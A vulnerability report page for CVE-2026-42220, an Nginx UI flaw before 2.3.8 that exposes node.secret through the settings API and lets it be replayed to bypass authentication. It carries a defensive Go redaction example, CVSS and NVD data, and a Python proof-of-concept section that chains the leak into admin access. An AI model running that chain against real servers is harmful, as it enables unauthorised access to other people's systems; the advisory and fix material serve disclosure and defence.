Security Vulnerability Report
CVE-2026-42220 CVSS 6.5 MEDIUM

CVE-2026-42220

Published: 2026-05-04 21:16:32
Last Modified: 2026-05-06 17:16:36

Description

Nginx UI is a web user interface for the Nginx web server. Prior to version 2.3.8, an authenticated user can call GET /api/settings and retrieve sensitive configuration values, including node.secret. The same node.secret is accepted by AuthRequired() through the X-Node-Secret header (or node_secret query parameter), causing the request to be treated as authenticated via the trusted-node path and associated with the init user. This issue has been patched in version 2.3.8.
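The chain described above is an information exposure (CWE-200: the settings response carries node.secret) that turns into an authorization bypass (CWE-863: the trusted-node path accepts that same value). The Go example below is added here and is not code from the Nginx UI project; it uses only the standard library rather than the project's web framework, assumes a simplified settings struct of its own with a constructed placeholder secret, and shows the leaky settings handler beside a hardened one that redacts the secret before serialisation, together with an in-process regression check of the kind a project could keep in its test suite so the secret cannot reappear in the settings API.

```go
package main

import (
	"bytes"
	"encoding/json"
	"fmt"
	"net/http"
	"net/http/httptest"
)

// Constructed settings shape for this example; an assumption, not the real
// Nginx UI settings struct. node.secret is the credential that the advisory
// says the trusted-node authentication path accepts.
type NodeSettings struct {
	Name   string `json:"name"`
	Secret string `json:"secret,omitempty"`
}

type Settings struct {
	Node NodeSettings `json:"node"`
}

// Constructed sample configuration with a placeholder secret value.
var sampleSettings = Settings{
	Node: NodeSettings{Name: "primary", Secret: "EXAMPLE-NODE-SECRET-PLACEHOLDER"},
}

// leakySettingsHandler models the pre-2.3.8 behaviour described in the
// advisory: the whole settings struct, secret included, is serialised for
// any authenticated caller of GET /api/settings.
func leakySettingsHandler(s Settings) http.HandlerFunc {
	return func(w http.ResponseWriter, r *http.Request) {
		w.Header().Set("Content-Type", "application/json")
		json.NewEncoder(w).Encode(s)
	}
}

// redactSettings returns a copy with the node secret blanked. Settings is
// passed by value, so the live configuration held by the caller is untouched.
func redactSettings(s Settings) Settings {
	s.Node.Secret = ""
	return s
}

// safeSettingsHandler is the hardened form: redact, then serialise. With the
// omitempty tag the "secret" key disappears from the response entirely.
func safeSettingsHandler(s Settings) http.HandlerFunc {
	return func(w http.ResponseWriter, r *http.Request) {
		w.Header().Set("Content-Type", "application/json")
		json.NewEncoder(w).Encode(redactSettings(s))
	}
}

// responseExposesSecret drives a handler in-process with httptest and reports
// whether the secret string appears anywhere in the JSON body. Keeping this
// as a unit test makes a regression of the leak fail the build.
func responseExposesSecret(h http.HandlerFunc, secret string) bool {
	rec := httptest.NewRecorder()
	h.ServeHTTP(rec, httptest.NewRequest(http.MethodGet, "/api/settings", nil))
	return bytes.Contains(rec.Body.Bytes(), []byte(secret))
}

func main() {
	secret := sampleSettings.Node.Secret
	fmt.Println("leaky handler exposes node.secret:",
		responseExposesSecret(leakySettingsHandler(sampleSettings), secret))
	fmt.Println("redacted handler exposes node.secret:",
		responseExposesSecret(safeSettingsHandler(sampleSettings), secret))
}
```

Redacting at serialisation time, rather than maintaining a separate "public" struct by hand, keeps the fix in one place; the check function is the part worth keeping permanently, since any later field added to the settings type that carries a credential would be caught the same way by extending the substring list.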

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:nginxui:nginx_ui:*:*:*:*:*:*:*:* - VULNERABLE
Nginx UI < 2.3.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Step 1: Authenticate as a low-privileged user
session = requests.Session()
# Assume we have valid credentials for a low-priv user
login_payload = {"username": "lowpriv_user", "password": "password"}
# login_resp = session.post("http://target/api/login", json=login_payload)

# Step 2: Retrieve sensitive configuration
settings_url = "http://target/api/settings"
resp = session.get(settings_url)
if resp.status_code == 200:
    data = resp.json()
    # The secret is exposed in the settings response
    secret = data.get("node_secret")
    if secret:
        print(f"[+] Exploit: Found node.secret -> {secret}")
        # Step 3: Use the secret to bypass AuthRequired as a trusted node
        headers = {"X-Node-Secret": secret}
        # Accessing a protected endpoint (e.g., admin only)
        target_url = "http://target/api/admin/config"
        exploit_resp = requests.get(target_url, headers=headers)
        if exploit_resp.status_code == 200:
            print("[+] Exploit Successful: Bypassed authentication!")
            print(exploit_resp.text)
        else:
            print("[-] Exploit Failed")
    else:
        print("[-] node.secret not found in response")
else:
    print("[-] Failed to retrieve settings")

References

https://github.com/0xJacky/nginx-ui/releases/tag/v2.3.8 (Release Notes)
https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-7jrr-xw9c-mj39 (Vendor Advisory, Exploit)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42220", "sourceIdentifier": "[email protected]", "published": "2026-05-04T21:16:31.870", "lastModified": "2026-05-06T17:16:36.317", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Nginx UI is a web user interface for the Nginx web server. Prior to version 2.3.8, an authenticated user can call GET /api/settings and retrieve sensitive configuration values, including node.secret. The same node.secret is accepted by AuthRequired() through the X-Node-Secret header (or node_secret query parameter), causing the request to be treated as authenticated via the trusted-node path and associated with the init user. This issue has been patched in version 2.3.8."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nginxui:nginx_ui:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.3.8", "matchCriteriaId": "FB1A4031-FD2F-49D7-8021-128BA057C4FA"}]}]}], "references": [{"url": "https://github.com/0xJacky/nginx-ui/releases/tag/v2.3.8", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-7jrr-xw9c-mj39", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": 
"https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-7jrr-xw9c-mj39", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}